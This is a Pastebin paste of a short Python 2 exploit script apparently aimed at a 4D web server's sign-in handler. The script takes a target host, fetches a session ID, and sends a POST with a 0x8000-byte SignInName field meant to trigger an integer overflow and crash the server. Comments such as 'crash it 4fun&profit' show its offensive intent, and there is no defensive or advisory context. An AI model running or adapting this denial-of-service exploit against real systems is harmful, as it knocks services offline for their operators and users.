Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #by r0i (@rmallof)
- #!/usr/bin/python
- import socket,sys,time,os
- #global vars
- neg="GET / HTTP/1.1\r\n\r\n"
- lim0="Location:"
- lim1="&"
- lim2="sess="
- buf="SignInName="+("A"*0x8000)+"&SignInPassword=FOO&Sign+In=Log+In" # >= 0x8000 to int overflow
- def nego(h): #starting connection and getting session
- s=socket.socket()
- try:
- s.connect(h)
- except:
- print"[x] Error connecting to remote host!"
- sys.exit(0)
- s.send(neg)
- time.sleep(1)
- rec=s.recv(1024)
- s.close()
- return rec
- def buildPOST(s,h,p,b): #building POST request for crashes server
- P="POST /4daction/wHandleURLs/handleSignIn?sess="+s+"&siteCode=0&lang=en& HTTP/1.1\r\n"
- P+="Host: "+h+"\r\n"
- P+="User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10\r\n"
- P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
- P+="Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
- P+="Accept-Encoding: gzip,deflate\r\n"
- P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
- P+="Keep-Alive: 115\r\n"
- P+="Connection: keep-alive\r\n"
- P+="Referer: http://"+h+p+"\r\n"
- P+="Content-Type: application/x-www-form-urlencoded\r\n"
- P+="Content-Length: %s\r\n" % str(len(b))
- P+="\r\n"
- P+=b
- time.sleep(1)
- return P
- def main():
- if len(sys.argv)!=2:
- print"\n[x] Usage: "+sys.argv[0]+" <host>\n\n"
- sys.exit(0)
- else:
- host=sys.argv[1]
- hostd=host,80
- #1
- print"[-] Getting HTTP session..."
- r=nego(hostd) #getting new session...
- path=r[r.index(lim0)+len(lim0)+1:r.rindex(lim1)+1] #search for PATH
- sess=path[path.index(lim2)+len(lim2):path.index(lim1)+len(lim1)-1] #search for SESSION hash
- time.sleep(1)
- print"[+] 0k, session ="+sess
- time.sleep(1)
- #2
- s=socket.socket()
- s.connect(hostd)
- print"[-] Bulding POST [Content-Length: %d bytes]..." % len(buf)
- POST=buildPOST(sess,host,path,buf) #build POST request with new session
- print"[+] Done, Sayonara ;)"
- s.send(POST) #crash it 4fun&profit :)
- time.sleep(1)
- s.close()
- if __name__=="__main__":
- main()
Add Comment
Please, Sign In to add comment